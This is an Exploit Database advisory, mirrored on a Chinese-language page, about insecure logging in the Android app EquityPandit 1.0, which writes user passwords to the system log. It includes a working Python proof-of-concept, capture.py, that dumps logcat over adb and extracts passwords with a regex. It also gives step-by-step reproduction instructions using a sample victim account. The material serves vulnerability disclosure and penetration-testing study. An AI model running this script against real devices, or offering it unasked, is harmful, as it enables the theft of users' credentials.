EquityPandit 1.0 – Password Disclosure

• Exploit Database
• 18 阅读

• 作者： ManhNho
  日期： 2019-05-28
• 类别：

  • local
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/46933/

• #Exploit title: EquityPandit v1.0 - Insecure Logging
  #Date:27/05/2019
  #Exploit Author: ManhNho
  #Software name: "EquityPandit"
  #Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
  #Version: 1.0
  # Category: Android apps
  #Description:
  
   - Sometimes developers keeps sensitive data logged into the developer
   console. Thus, attacker easy to capture sensitive information like password.
   - In this application, with adb, attacker can capture password of any
   users via forgot password function.
  
  #Requirement:
  
   - Santoku virtual machine
   - Android virtual machine (installed "EquityPandit" apk file)
   - Victim user/password: victim@abc.com/123456
   - Exploit code named capture.py in Santoku vm as below:
  
  import subprocess
  import re
  
  process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
  stdout=subprocess.PIPE)
  dumps = process_handler.stdout.read()
  password_list = re.findall(r'password\s(.*)', dumps)
  print 'Captured %i passwords! \nThey are:' %len(password_list)
  for index, item in enumerate(password_list):
  	print '\t#%i: %s' %(int(index)+1, item)
  
  #Reproduce:
  
   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)
  
  adb connect x.x.x.x
  
  
   - Step 2: From Android machine, open EquityPandit, click forgot password
   function for acccount "victim@abc.com" and then click submit
   - Step 3: From Santoku, execute capture.py
   - Actual: Password of "victim@abc.com" will be show in terminal as
   "123456"
  
  #Demo:
  
  https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv